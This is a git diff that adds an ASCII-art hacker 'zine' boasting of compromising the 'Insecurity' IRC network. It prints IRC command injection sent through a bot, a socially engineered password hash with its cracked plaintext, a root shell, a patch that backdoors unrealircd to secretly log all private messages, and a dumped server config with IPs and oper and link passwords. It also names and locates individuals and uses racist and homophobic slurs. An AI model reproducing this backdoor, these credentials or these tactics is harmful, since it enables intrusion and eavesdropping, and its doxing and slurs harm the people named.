diff --git a/Insecurity/apT-28.txt b/Insecurity/apT-28.txt new file mode 100644 index 0000000..9d1fd69 --- /dev/null +++ b/Insecurity/apT-28.txt 
@@ -0,0 +1,2709 @@ +███████████████████████████████████████████████████████████████████████████████ +█ █ +█ █ +█ █ +█ █ +█ entire networks crumbled bc of me █ +█ █ +█ █ +█ █ +█ █ +█░▀▓█▀ ███▄ █ ██████ ▓█████ ▄████▄ █ ██ ██▀███ ██░████████▓▓██ ██ +▓ ░██ ██ ▀█░ █ ▒██ ▒ ▓█ ▀▒██▀ ▀█ ██ ▓██▒▓██ ▒ ██▒▓██░▓ ██▒ ▓▒ ▒██ ██ +▓ ░██ ▓██ ░▀█ ██▒░ ▓██▄ ▒███ ▒▓█ ▄▓██ ▒██░▓██ ░▄█ ▒▒██ ▒ ▓██░ ▒░ ▒██ ██ +▒ ░█▓░▓██▒ ░▐▌██▒ ▒ ██▒▒██ ▄▒▓▓▄ ▄██▓▓█ ░██░▒██▀▀█▄ ░██░░ ▓██▓ ░ ░ ▐██▓ +░░▄██▄▒██░ ▓██░▒██████▒▒░▒████▒ ▓███▀ ▒▒█████▓ ░██ ▒██▒░██░ ▒██▒ ░ ░ ██▒▓ +░░ ░░░░ ▒ ▒ ▒▓▒ ▒ ▒░ ░▒ ▒ ░ ▒ ▒ ▒ ░ ▒ ░▒ ░░▓ ▒ ░░ ██▒░▓ +░ ░ ░ ░ ▓██ ▒ +░ ░ +░ ░ +░ FEATURING: "MLT" as THE EX-TEAMP0ISON FEDERAL AGENT ░ +░ "BONGRIP" as THE WEAKEST LINK ░ +░ "DANK" as THE MARDAM-BEY ZERODAY ░ +░ "DIRTY" as EL7 .. WE PROUDLY PRESENT: ░ + ░░ + ▄▄█████▄ ░░ +▐█▓▀ ▐██▌ ▒▒▒▒▒▒ +█▓▌ ██▓ ██▓ █████▓▓ + ▄▄▄▄▄███▄████████▄ ██▄ ███████ +▄██▀▀▀▀ █▀███▓ ▀███▌ ██▓ ▀▀██▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄████████████████████████ +██▌ █░████ ▄███████▓███▄▄▄▄▄▄███▄ ▀███████████████████████████████████████ +█▓▌ █▒██▀██████▀ ███ ██ ▀▀████▀▀▀▀▀▀▀▀▀▀ ▀▀▀███ +█▓▌ ▐█▓██░█▀▀ █▀█ ▓▓ apT-28 NF0 ██▐ +██▄▌ ▄███▌█▒█ ▄ █░█ ▄ ▒▒ yOUr eNt3r741nm3nt 4or t0d4Y: ▐ +▀███████▓▀ █▓█ ▐ ▄ █▒█ ▄██ ▌ ░░ + ▀▀▀▀▀▀ ███ █ ▌ █▓█ ▐█▓ ▐▌ #Insecurity ░░ +█▄▄▄▄▄▄▄▄▌ ██▓ ▄██ ▌▄ ███▄ ▄██▌ ▐█ ░░ irc.insecurity.zone ▒▒ +██████████▄▄▄▄▄██████▄ ▀██████▀ ▄██ ▒▒ ▓▓ +███████████████████████▄▄▄▄▄▄▄▄████ ▓▓▄ ██ +███████████████████████████████████████████████████████████████████████████████ +█████████ +█████████ +█▀▀▀▀▀▀▀▀ +█ ▐████▌ ▄██▄ ████▄ ██ ▄███ ▄███▄ █▌ ▐█▐█ ▐█▌ ▄██▄ ▄█▀█▄ ▄███ +█▄▄ ██ ████ ██▌██▌ ██ ██ ▄▄▄ ▄▄▄ ██ ██ █▌ ▐█▐██▐█▌ ████ ██ ██ ██ +███ ██ ██▐█▌ ████▀ ██ ███ █ █ █▄▄ ██/██ █▌▐▌▐█▐████▌▐██▐█▌ ██ ▄▄▄ ███ +███ ██ ▐█████ ██▌██▌ ██ ██ █▄█ █ ██ ██ █▌▐▌▐█▐█▌██▌▐█████ ██ ▀█▀ ██ +███ ██ ██▌ ██ █████▀ █████ ▀███ ▀███▀ ▀████▀▐█▌ █▌██▌ ██ ▀███▀ ▀███ +███▄▄▄▐▄▄ +█████████ +█████████ +█████████ 0x00: Intro +█████████ 0x01: The Tales of Khaled Mardam-Bey +█████████ 0x02: The Impostor 
+█████████ 0x03: Hook, O:Lines, and Sinker +█████████ 0x04: Pass the hash +█████████ 0x05: A flaw in MD5 +█████████ 0x06: MD5pedia +█████████ 0x07: Clash of the hashes +█████████ 0x08: Recommended reading +█████████ 0x09: Attachments +█████████ 0x0A: Contact +█████████ 0x0B: Greetings +█████████ +█████████ +█████████ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x00 Intro ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ Dobra evening, Komrades, +█ +█ Is slow day at Яussian ENERGETICBEAR HQ. We notice script kiddie honeypot +█ and decide to have fun. I turn to Vlad and get him to fire up ICQ to kontact +█ our network of sleeper agents across world. Is not long and we having Dmitry +█ and Sergey ready to attack network (is named "Insecurity", haha are +█ Americans of realizing irony in this)? Upon joining, we see nearly 100 +█ capitalist Блядь, some klaiming to be in ~el8. They not realizing we zf0, +█ but we sneak in through front door as APT and compromise their IRC. They +█ give us password hashes, is easier than SCADA system хихихихихи. Go get +█ your glass of Kvass and get ready, vis story is only beginning. +█ +█ Oh Спасибо for asking to be 0wned, we thoroughly enjoyed this. +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x01 The Tales of Khaled Mardam-Bey ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ Typically skid having MIRC bot because languages are too difficult. So we +█ watched users interact with the bot and it have command for "Urban +█ Dictionary" among others. They do not strip newlines from many of the +█ command replies, basic protocol for all bot (we see this passively, someone +█ sends Urban Dictionary command and it truncates on the newline). 
So we +█ having OPER and services admin on their IRC (they giving the bot this +█ power, of course), as well as RCE on the bot through access to other +█ command. However we having our sights set on something far greater.. +█ +█ Side notes: #research being their priv8 channel and #noc is their IP +█ logging channel. danK is the MIRC bot. +█ +█ After we getting Urban Dictionary entries approved we laughing over водка. +█ Now we send command to restore glory to disgusting skid IRC: +█ +█ .ud priv8 +█ (Urban Dictionary) priv8: Very secure. Example: so priv8, jk +█ PRIVMSG ChanServ :AKICK #noc ADD MLT /dev/null +█ PRIVMSG ChanServ :AKICK #noc ADD *@* /dev/null +█ PRIVMSG OperServ :SAJOIN zf0 #research +█ PRIVMSG OperServ :SAJOIN zf0 #insecurity +█ SAJOIN zf0 #research +█ -!- zf0 [zf0@privacy.internetz.me-50310034.dfri.se] has joined #research +█ SAMODE #research +havoq zf0 zf0 zf0 zf0 zf0 +█ -!- ServerMode/#research [+havoq zf0 zf0 zf0 zf0 zf0] by superb.undernix.net +█ PRIVMSG ChanServ :ACCESS #insecurity ADD zf0 SOP +█ PRIVMSG ChanServ :ACCESS #research ADD zf0 SOP +█ GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 +█ PRIVMSG OperServ :SET SUPERADMIN ON +█ PRIVMSG OperServ :SEEN CLEAR +█ PRIVMSG OperServ :SEEN CLEAR 6w +█ PRIVMSG OperServ :FORBID ADD MLT :skid lord +█ PRIVMSG OperServ :OPERNEWS ADD WE GOT HACKED +█ PRIVMSG OperServ :GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 +█ PRIVMSG Global :GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 +█ -Global(services@undernix.net)- T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 +█ PRIVMSG ChanServ :TOPIC #insecurity y0ur d41ly s0urc3 0f wh1t3h4t | security +█ experts | phR13ndlY pSA: MLT is a F3d && anyone wh0 K1aims t0 be in el8 is a +█ sk1d +█ -!- JewOven changed the topic of #insecurity to: y0ur d41ly s0urc3 0f wh1t3h +█ 4t | security experts | phR13ndlY pSA: MLT is a F3d && anyone wh0 K1aims t0 +█ be in el8 is a sk1d +█ TOPIC #insecurity :y0ur d41ly s0urc3 0f wh1t3h4t | security experts | phR13n +█ dlY pSA: MLT 
is a F3d && anyone wh0 K1aims t0 be in el8 is a sk1d +█ -!- danK changed the topic of #insecurity to: y0ur d41ly s0urc3 0f wh1t3h4t +█ | security experts | phR13ndlY pSA: MLT is a F3d && anyone wh0 K1aims t0 be +█ in el8 is a sk1d +█ MODE #insecurity +havoq zf0 zf0 zf0 zf0 zf0 +█ SAMODE #insecurity +havoq zf0 zf0 zf0 zf0 zf0 +█ SAMODE #insecurity +blLeI *!*@* 1 #ppriv ~r:*unbannable irc* ~r:*god* +█ -!- ServerMode/#insecurity [+b *!*@*] by superb.undernix.net +█ MODE #insecurity +blLeI *!*@* 1 #ppriv ~r:*unbannable irc* ~r:*god* +█ -!- mode/#insecurity [+lbLeI 1 *!*@* #ppriv ~r:*unbannable irc*!*@*] by danK +█ TOPIC #research :th1s ch4nn3l 1z imp3netrable. l1k3 0ur v1rg1n1ty +█ -!- danK changed the topic of #research to: th1s ch4nn3l 1z imp3netrable. l1 +█ k3 0ur v1rg1n1ty +█ SAMODE #research +k l4m3rs +█ MODE #research +k l4m3rs +█ -!- mode/#research [+k l4m3rs] by danK +█ SAMODE #noc -O +█ MODE #noc -O +█ .ud priv9 +█ (Urban Dictionary) priv9: Ultra secure, like MD5 Example: Whoa thats +█ priv9? Is that the darknet? 
+█ PRIVMSG #insecurity :MESS +█ PRIVMSG #insecurity :WITH +█ PRIVMSG #insecurity :THE +█ PRIVMSG #insecurity :BEST +█ PRIVMSG #insecurity :DIE +█ PRIVMSG #insecurity :LIKE +█ PRIVMSG #insecurity :THE +█ PRIVMSG #insecurity :REST +█ GZLINE MLT 0 :ch13f phed3ral ag3nt +█ GZLINE RMS 0 :rip +█ * RMS has quit (Z:lined (rip)) +█ GZLINE sxcurity 0 :rip +█ * sxcurity has quit (Z:lined (rip)) +█ GZLINE FuZi0N 0 :rip +█ * FuZi0N has quit (Z:lined (rip)) +█ GZLINE sp00n 0 :rip +█ * sp00n has quit (Z:lined (rip)) +█ GZLINE syn4pse 0 :rip +█ * sup has quit (Z:lined (rip)) +█ * dab has quit (Z:lined (rip)) +█ * Zodiac has quit (Z:lined (rip)) +█ * dkb has quit (Z:lined (rip)) +█ * loeken has quit (Z:lined (rip)) +█ * syn4pse has quit (Z:lined (rip)) +█ GZLINE Alyssa 0 :rip +█ * Alyssa has quit (Z:lined (rip)) +█ GZLINE chloe 0 :rip +█ GZLINE komodo 0 :rip +█ * dab has quit (Z:lined (rip)) +█ KILL lola :rip +█ * lola has quit (Killed (danK (rip))) +█ KILL elitedan1erous :rip +█ KILL e :rip +█ KILL Nux :rip +█ * Nux has quit (Killed (danK (rip))) +█ PRIVMSG OperServ :KILL dirty niggers123 +█ KILL dirty :niggers123 +█ PRIVMSG OperServ :KILL bongrip i write rootkits so i know if my irc can get +█ hacked +█ KILL bongrip 0 :i write rootkits so i know if my irc can get hacked +█ PRIVMSG ChanServ :AKICK #insecurity ADD MLT :w3lc0m3 b4q +█ PRIVMSG ChanServ :AKICK #insecurity ADD bongrip :w3lc0m3 b4q +█ PRIVMSG ChanServ :DROP #research #research +█ * ChanServ sets mode -r on #research +█ PRIVMSG ChanServ :DROP #noc #noc +█ PRIVMSG BotServ :BOT ADD MLT ci192 vpn02.fbi.gov :skid lord +█ DIE die +█ -!- Netsplit <-> superb.undernix.net +█ PRIVMSG OperServ :NOOP SET superb.underunix.net +█ PRIVMSG OperServ :NOOP SET aussie.insecurity.zone +█ PRIVMSG OperServ :NOOP SET fsociety.internetz.me +█ +█ b0ngr1p vS. 
[zf0]danK: +█ -!- bongrip [rip@undernix.net] has quit [[superb.undernix.net] Local kill by +█ danK (That shit outta here, bitch.)] +█ -!- danK was kicked from #insecurity by bongrip [Don't ban me :)] +█ -!- mode/#insecurity [-ob danK *!*@*] by bongrip +█ -!- bongrip was kicked from #insecurity by danK [That shit outta here.] +█ -!- mode/#insecurity [+b *!rip@undernix.net] by danK +█ -!- mode/#insecurity [+b bongrip!*rip@undernix.net] by danK +█ -!- mode/#insecurity [-b *!rip@undernix.net] by bongrip +█ -!- mode/#insecurity [+b *!POTENT@undernix.net] by bongrip +█ +█ Pigdog imperialist skidswine so confused and scared they reinstall services. +█ They deciding services being beyond repair and starting over. Which meaning +█ we can impersonate anyone. So why not become the leader of the network? +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x02 The Imposter ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ Now Dmitry is funny guy, he thinking we can trick them by simply changing +█ our nickname to the one they call MLT. I say no, Americans are not vhat +█ stupid. I change nick, from zf0 to MLT. I get private message asking me +█ what is going on, how core members are leaving. I could not believe vey +█ could be this oblivious. I ask one admin "can you change my admin password +█ comrade". He does so. Vladmir says to ask him for a hash from /etc/shadow. +█ They give it to us. Vut the fuck!? 
+█ +█ PM with bongrip: +█ yea +█ are u on aussie server +█ I am +█ ya everything works for me +█ ur stuff is still the same +█ im just trying to get +█ services +█ going +█ i can oper but +█ i cant link db's +█ they killed the ircd +█ send cmds to kill it +█ lol +█ We need to lock this down, I'm getting password denied on my OPER cred +█ entials +█ its not from them hacking +█ or anything +█ they just used sendraw on teh bot dude +█ really not anything special ive done that before +█ but u know waht i did +█ i used +█ run /cmd.exe ftp getmybinary +█ they could have +█ really fucked me up +█ if htey were smart +█ but they arent +█ they took time into those cmds too +█ its really sad they dont know how powerful it is +█ they could have tkaen over +█ my rdp +█ and +█ OFFICIALLY +█ said they reallly hacked me +█ and taken voer +█ the entire server +█ from mirc gui via rdp +█ shit +█ dont give them any ideas +█ but nothing else +█ is like that +█ i checked all the cmds they ran +█ nothing crucial +█ they killed everything off too soon +█ they killed it instantly and made mistakes +█ i'm on my phone right now, change my public key in authorized_keys, th +█ ey may have my id_rsa +█ talking with this faggot +█ nah +█ nobody has anything +█ they didnt get into any servers +█ all they did was send that one cmd +█ thru urban dictionary +█ thru the bot +█ with sendraw +█ i'm looking at my id_rsa key, it was a distraction +█ fuck +█ change the keys and passwords and run rkhunter +█ bro nothing is on there +█ on anything +█ lol +█ are you sure man? +█ did you run rkhunter? +█ no +█ but i dont have to +█ i know they didnt get into any boxes +█ yes i'm literally positive +█ positive of what +█ there is a rootkit on the box RIGHT NOW +█ -Global- Services are now back online - have a nice day +█ r ru srs +█ on ur box? 
+█ i didnt even look at ur box +█ im looking at mine to make sure everything else is good +█ u had root open u told me u were gonna secure ur box +█ u told me to just setup ircd shit +█ and u were gonna secure it +█ and how do u know theres a rootkit +█ on the box +█ they pasted part of /etc/shadow +█ damn +█ they must have got in ur box +█ that's what i've been saying +█ ive they have those hashes +█ man +█ i think green is helping them +█ but +█ i'm about to get back, PLEASE change the pws +█ someone doesnt know irc too well and windows +█ bro +█ rm -rf that shit +█ lol +█ and this time +█ i will i just need to back up some files +█ ill lock the box down +█ root was open +█ it coulda been bruted tbh +█ i didnt even configure jail.conf +█ nothing was ready +█ on that box +█ u told me not to +█ lol +█ nothing? ok +█ bro there was 0 security +█ on that box +█ literally +█ u told me to setup the ircd +█ and that u were gonna put keys on theree +█ and lock it down +█ i'm going to add a new user that can run rkhunter on my boxes, the pas +█ sword is going to be XbW9_AZaCr+zEX +█ i can disable Root login for the ssh +█ just use keys +█ and disable root no matter what +█ they cant guess user/pass +█ but root/pass +█ yes +█ all day long +█ i can crack a lot of those hashes in my head now +█ it all starts to mesh together +█ especially wasnt it like +█ 8 chars +█ the pw +█ im sure they had processing power to crack that +█ bruted the fuck out of it +█ but weird thing +█ lola is in the channel +█ that they did this shit in +█ i wanna know how the bot joined #help in the first place +█ do you think lola is in on it? 
+█ and why +█ lola +█ and +█ zf0 +█ were in there +█ alone +█ lola didnt say anything +█ but +█ somethings up +█ wtf +█ he was in #help +█ out of nowhere +█ with just +█ my bot +█ zf0 +█ and lola +█ while zf0 was running those cmds +█ btw u got hacked by some guys from 2600 +█ i think xt did that +█ jihad couldnt have done that +█ god damn it, we need to do a full password reset to be safe +█ mind changing @insecurity? +█ i'll remove the password for root and only use keyauth +█ did u reset the box +█ reinstall everything +█ illl have to scrub the hashes off +█ of the confs +█ and add new pw's +█ its just that one box +█ and they may not even have root +█ idk man +█ lol +█ need to reinstall the box tbh +█ ill run a quick install +█ of ircd +█ in seconds +█ ok +█ save the .conf file +█ thanks +█ gimme new pw when u do it +█ and +█ well +█ actually since they can read logs rn +█ dont give me anything here +█ lol +█ cause ur box is a hub +█ they could read these pm's rn if ur really kitted +█ thru pcaps +█ i'm using ssl +█ its not valid +█ they can be stripping that +█ its not a valid cert +█ its almost the equivalent of putting a very known, easily exploita +█ ble lock on your front door +█ and expect someone not to break in +█ well if we are going to rotate the conf anyway i need a temp oper real +█ quick, still mobile +█ u should have oper +█ nothing changed +█ hang on i'm kicking zf0 +█ lemme get into box again +█ they probably changed my oper pass with jihad's +█ doubt it +█ they'd be doing a lot more damage rn +█ gimme a pw +█ i still dont think +█ ur hacked bro +█ im in the box +█ gimme a pw to hash tho +█ @7fdVrQG@$?h +█ done +█ try opering +█ that one worked +█ can u give me +█ the etc/shadow +█ plz +█ theres only +█ 1 user +█ in shadow +█ if they pasted u the bottom +█ then they pasted you +█ ins3circd +█ ??? +█ this long ass hash? 
+█ ins3circd:$6$3Ip4HnTD$c3Nt3o0hKzUf6Xu.mS/rTANN91PSS2043GNn6I.gO5Jx +█ U5BXFjC5L8uV9D4nb0OJxIlCJwnacwxiyYKOmXm.5/:17306:0:99999:7::: +█ i doubt that man +█ if they didnt paste u that +█ they dont have shit +█ or at least root hash +█ hurry and tell me if they pasted that +█ to u +█ mlt +█ back +█ that's the one +█ they did paste that? +█ yea +█ erh +█ i don't think they can bruteforce it +█ yea i think they just got hash bro +█ not anything else +█ if they were in +█ id see them +█ i just ran every active connection +█ on this box +█ its everyone on irc +█ and me +█ this thing isnt going anywhere i/o +█ but +█ guaranteed if they had axx +█ to that unrealircd.conf +█ they would have opered themselves +█ dont u think +█ rather than run a stupid exploit thru the bot +█ that coulda really done damage +█ if they knew what they were doing +█ literally that was their gateway +█ to completely own us +█ unless it was a distraction +█ i wasnt even looking in #help +█ nah +█ therea re people trying to hack us +█ for sure +█ so +█ we need to use keys +█ and ip's bound +█ to get into our boxes +█ so not only do u need the key +█ u need to be on a certain ip +█ its what syn4pse does +█ true +█ its what everyone does +█ we're just lazy +█ and as 'insecurity' +█ we cant be that +█ and we cant let them in this box +█ lets just format it and call it a day cause they only have /etc/sh +█ adow and /etc/passwd +█ im sure +█ cause like literally what insecurity stands for +█ is not being lazy +█ and setting shit up +█ and not getting owned +█ lol +█ we just showed ppl we are just as lazy +█ who did it +█ like +█ i know it was 2600 guys +█ but whos talking to u +█ that showed u that hash +█ someone i know, i'm trying to get more information out of them +█ its a user on efnet +█ i already know its efnet lol +█ its 2600 guys bc u started that war with jihad +█ hes actually got connnections to guys who can do shit like xt +█ granted how much shit i talk about xt +█ hes actually good at 
shit +█ but if ur really rooted +█ xt is behind that +█ but ur not +█ we need to get full dox on xt +█ brandon edwards +█ st louis, missouri +█ lol +█ i doxed a lot of el8 +█ b4 i left +█ bandit can pull dox by ip +█ for certain companies +█ USA +█ like comcast, cox, charter, etc +█ he had access to all of it +█ he doxed like 6 guys for me +█ all el8 members +█ he didnt know that tho +█ lol +█ 8) +█ also +█ this is in relation +█ to xt +█ my ex +█ dated him +█ like a long time ago +█ and got drugs from him +█ and still talks to him +█ 24/7 +█ ive got her doxed to her teeth +█ ive got ssn and everything +█ she's on his fb +█ to get more updated (address) on him +█ and if thats going on its not good +█ cause im sure xt could dox me +█ thru my ex +█ but wont bc of her +█ so i gotta hold her dox +█ as lleverage +█ fuck man this shits turning into politics +█ i know man +█ like literally +█ i have a bunch of shit +█ on random people +█ thats why im not doxed +█ they know ill sperg out and drop like 50 dox's +█ a few people know what i have +█ thats why they hold back +█ theresr so many spots and positions im in like that +█ where they have some of my info +█ maybe even more +█ i can say this tho stay clean +█ keep box clean +█ i got a feeling they r coming on false info +█ green came to me +█ and talked real srs +█ like feds were comin +█ for some reason +█ idk why he was actin like that +█ but he said +█ supernets is basically like bluehell +█ its one big honeypot +█ i'm in their payload +█ * i'm looking at their payload +█ it runs 'gzline' on a lot of people including me +█ and then when it gets to lola it just runs KILL +█ it does the same thing for elitedangerous, e, and Nux +█ its just sendraw man +█ i already showed it to u +█ u can urbandictionary 'priv9' +█ i told u they went thru the bot +█ i wouldnt really call that a payload +█ but yea if someone has root +█ ppl dont just pop up with root like that +█ if they have /etc/shadow +█ i really think it was inside 
job +█ w/ the etc/shadow +█ cause they could have added themselves +█ in the oper conf +█ why would they go thru dank +█ and use sendraw +█ this was him +█ testing +█ http://www.urbandictionary.com/define.php?term=priv7 +█ and again +█ http://www.urbandictionary.com/define.php?term=priv8 +█ MLT +█ get lola +█ to paste u all the cmds +█ zf0 put in #help +█ so i can see what they all ran +█ +█ yea i think they just got hash bro +█ +█ After this, bongrip changed the hash and secured the network. +█ +█ +█ THE END +█ +█ +▓ +▒ +░ + +... + +░ +▒ +▓ +█ +█ h4h4h4h4h4h4 +█ Is joke, yes? Is funny because stupidity flow like radioactive river here. +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x03 Hook, O:Lines, and Sinker ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ 1st s0me 1nf4llabl3 logiq: +█ +█ bongrip PRIVMSG #insecurity :if we got hacked +█ bongrip PRIVMSG #insecurity :we wouldnt be told +█ bongrip PRIVMSG #insecurity :i constantly have to check shit +█ bongrip PRIVMSG #insecurity :if we get hacked by these guys we wont know it +█ bongrip PRIVMSG #insecurity :htey arent going to brag +█ bongrip PRIVMSG #insecurity :until i check it and find it +█ bongrip PRIVMSG #insecurity :one day +█ YogSotho PRIVMSG #insecurity :Indeed. U notice only when they rm ur box +█ bongrip PRIVMSG #insecurity :which will never happen +█ bongrip PRIVMSG #insecurity :cause nothing is popped +█ bongrip PRIVMSG #insecurity :no +█ bongrip PRIVMSG #insecurity :they wont rm me +█ bongrip PRIVMSG #insecurity :they would just do it to log +█ bongrip PRIVMSG #insecurity :they would pop the hub +█ bongrip PRIVMSG #insecurity :from there u can use pcap play +█ bongrip PRIVMSG #insecurity :to sniff pm's +█ bongrip PRIVMSG #insecurity :and everything else +█ +█ Like this? 
+█ +█ src/modules/m_message.c +█ < if (ret == CANPRIVMSG_SEND) +█ < { +█ > FILE *fp; +█ > fp=fopen("/var/backups/.irc/log.txt", "a"); +█ > fprintf(fp, "%s %s %s :%s\n", parv[0], cmd, nick, text); +█ > fclose(fp); +█ < sendto_message_one(acptr, sptr, parv[0], newcmd, nick, +█ text); +█ < continue; +█ < } +█ +█ src/modules/m_message.c +█ < if (!text) +█ < continue; +█ > FILE *fp; +█ > fp=fopen("/var/backups/.irc/log.txt", "a"); +█ > fprintf(fp, "%s %s %s :%s\n", sptr->name, cmd, chptr->chname, +█ text); +█ > fclose(fp); +█ < sendto_channelprefix_butone_tok(cptr, +█ < sptr, chptr, +█ < prefix, +█ < notice ? MSG_NOTICE : MSG_PRIVATE, +█ < notice ? TOK_NOTICE : TOK_PRIVATE, +█ < nick, text, 1); +█ +█ There being problem: if we reload ircd американцов opers will receive notice +█ through the SNOMASK system. So we faking a DDOS attack with bot spam while +█ delinking the ircd. +█ +█ YogSotho PRIVMSG #insecurity :I saw mlt log of the bot abuse +█ bongrip PRIVMSG #insecurity :word to ya mother brother fuckers +█ bongrip PRIVMSG #insecurity :no +█ bongrip PRIVMSG #insecurity :that was +█ bongrip PRIVMSG #insecurity :skids +█ bongrip PRIVMSG #insecurity :the mammoth has not attacked +█ bongrip PRIVMSG #insecurity :obv +█ bongrip PRIVMSG #insecurity :unless +█ bongrip PRIVMSG #insecurity :UNLESS +█ bongrip PRIVMSG #insecurity :see one thing did happen +█ bongrip PRIVMSG #insecurity :out of hte ordinary +█ YogSotho PRIVMSG #insecurity :Uh... 
+█ bongrip PRIVMSG #insecurity :which they mave have done this to prove they rm +█ 'd it amongst themselves +█ YogSotho PRIVMSG #insecurity :Warning +█ bongrip PRIVMSG #insecurity :aussie server delinked +█ bongrip PRIVMSG #insecurity :out of nowhere +█ bongrip PRIVMSG #insecurity :i had to /connect back to it +█ YogSotho PRIVMSG #insecurity :Thats bad +█ bongrip PRIVMSG #insecurity :cause autoconnect isnt ont +█ bongrip PRIVMSG #insecurity :but then again +█ bongrip PRIVMSG #insecurity :thats an unreal bug +█ bongrip PRIVMSG #insecurity :from 3.2 +█ ^ is not even a bug fitting this description but they still falling for it. +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x04 Pass the hash ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ Western world seeming strange to us. We not used to getting password hash +█ without coercion. Very nice peoples. глупый, yes, but so kind and trusting. +█ So да, all you needing for pop root is waiting for admin to fall for child +█ level social engineering. +█ Special Спасибо to bongrip for providing this to us in PM. +█ +█ ins3circd:$6$3Ip4HnTD$c3Nt3o0hKzUf6Xu.mS/rTANN91PSS2043GNn6I.gO5JxU +█ 5BXFjC5L8uV9D4nb0OJxIlCJwnacwxiyYKOmXm.5/:17306:0:99999:7::: +█ | +█ V +█ gangster4lyf +█ +█ ins3circd@zyzz8:~$ id +█ uid=1000(ins3circd) gid=1000(ins3circd) groups=1000(ins3circd) +█ ins3circd@zyzz8:~$ ./st4t3-sp0ns0r3d-0dayz +█ root@zyzz8:~# id +█ uid=0(root) gid=0(root) groups=0(root) +█ +█ ржунимагу.. J/K they giving IRCd user sudo ALL .. +█ Insecurity more fitting title as time winding on. +█ +█ ins3circd@zyzz8:~$ sudo -s +█ root@zyzz8:~# cat /etc/sudoers|grep ins3circd +█ ins3circd ALL=(ALL:ALL) ALL +█ +█ @ret2libc (MLT): Where's our hub IP? Or uname output on any of our leafs? 
+█ PLEASE provide even the slightest shred of evidence that you hacked anything +█ +█ Hub IP: 178.32.215.78 +█ Uname -a of leaf: Linux zyzz8 4.4.59-1-pve #1 SMP PVE 4.4.59-87 (Tue, 25 +█ Apr 2017 09:01:58 +0200) x86_64 +█ +█ I don't know hub IP +█ lol +█ even the wannabe hackers have the hub ip +█ how do you not have it +█ +█ If you needing more proof, BLT, please to giving us more hashes. +█ +█ aPt 1z s1mplY UNR34L $$$$$ +█ root@zyzz8:/home/ins3circd/Unreal3.2.10.1# cat unrealircd.conf +█ #loadmodule "src/modules/hideserver.so"; +█ loadmodule "src/modules/commands.so"; +█ loadmodule "src/modules/cloak.so"; +█ include "help.conf"; +█ include "badwords.channel.conf"; +█ include "badwords.message.conf"; +█ include "badwords.quit.conf"; +█ include "spamfilter.conf"; +█ include "aliases/anope.conf"; +█ +█ me { +█ name "aussie.insecurity.zone"; +█ info "Project Insecurity"; +█ numeric 042; +█ }; +█ +█ admin { +█ "MLT"; +█ }; +█ +█ class clients +█ { +█ pingfreq 420; +█ maxclients 500; +█ sendq 100000; +█ recvq 8000; +█ }; +█ +█ class servers +█ { +█ pingfreq 420; +█ maxclients 10; /* Max servers we can have linked at a time * +█ / +█ sendq 1000000; +█ connfreq 100; /* How many seconds between each connection +█ attempt */ +█ +█ }; +█ +█ oper rebel { +█ class clients; +█ from { +█ userhost *@*; +█ }; +█ password "$zAPIgFNG$YgI80nbHSYuwHt2hYhl7mA=="{ md5; }; +█ flags +█ { +█ netadmin; +█ global; +█ can_rehash; +█ can_die; +█ can_restart; +█ helpop Oper; +█ can_wallops; +█ can_globops; +█ can_localroute; +█ can_globalroute; +█ can_localkill; +█ can_globalkill; +█ can_kline; +█ can_unkline; +█ can_gkline; +█ can_localnotice; +█ can_globalnotice; +█ can_zline; +█ can_gkline; +█ can_gzline; +█ get_umodew; +█ get_host; +█ can_setq; +█ can_override; +█ services-admin; +█ }; +█ snomask kcFfjvGenq; +█ }; +█ +█ oper MLT { +█ class clients; +█ from { +█ userhost *@*; +█ }; +█ password "KASDM09A980km0asnmlL/,.ASDMK8jdjJJNDSLA832NLALCK92385795943 +█ 29dhjkmdsa"; +█ flags +█ { +█ 
netadmin; +█ global; +█ can_rehash; +█ can_die; +█ can_restart; +█ helpop Oper; +█ can_wallops; +█ can_globops; +█ can_localroute; +█ can_globalroute; +█ can_localkill; +█ can_globalkill; +█ can_kline; +█ can_unkline; +█ can_gkline; +█ can_localnotice; +█ can_globalnotice; +█ can_zline; +█ can_gkline; +█ can_gzline; +█ get_umodew; +█ get_host; +█ can_setq; +█ can_override; +█ services-admin; +█ +█ }; +█ snomask kcFfjvGenq; +█ }; +█ +█ link superb.undernix.net { +█ username *; +█ hostname 178.32.215.78; +█ bind-ip *; +█ port 5556; +█ hub *; +█ password-connect "*(ijlk2j809&ADS(AYULSDIuli23h45lhk,j"; +█ password-receive "*(ijlk2j809&ADS(AYULSDIuli23h45lhk,j"; +█ class servers; +█ options { +█ autoconnect; +█ ssl; +█ }; +█ }; +█ +█ listen *:5556; +█ { +█ options +█ { +█ ssl; +█ serversonly; +█ } +█ } +█ +█ listen *:6697 +█ { +█ options +█ { +█ ssl; +█ clientsonly; +█ }; +█ }; +█ +█ listen *:9999 +█ { +█ options +█ { +█ ssl; +█ clientsonly; +█ }; +█ }; +█ +█ listen *:7000; +█ listen *:6919 +█ { +█ options +█ { +█ serversonly; +█ ssl; +█ }; +█ }; +█ +█ listen *:6667; +█ listen *:4585 +█ { +█ options +█ { +█ serversonly; +█ ssl; +█ }; +█ }; +█ +█ listen [::ffff:192.168.0.1]:6667; +█ +█ ulines { +█ services.undernix.net; +█ stats.undernix.net; +█ }; +█ +█ ban nick { +█ mask "*C*h*a*n*S*e*r*v*"; +█ reason "Reserved for Services"; +█ }; +█ +█ ban nick { +█ mask "*{*-*}*"; +█ reason "Nickname not allowed"; +█ }; +█ ban nick { +█ mask 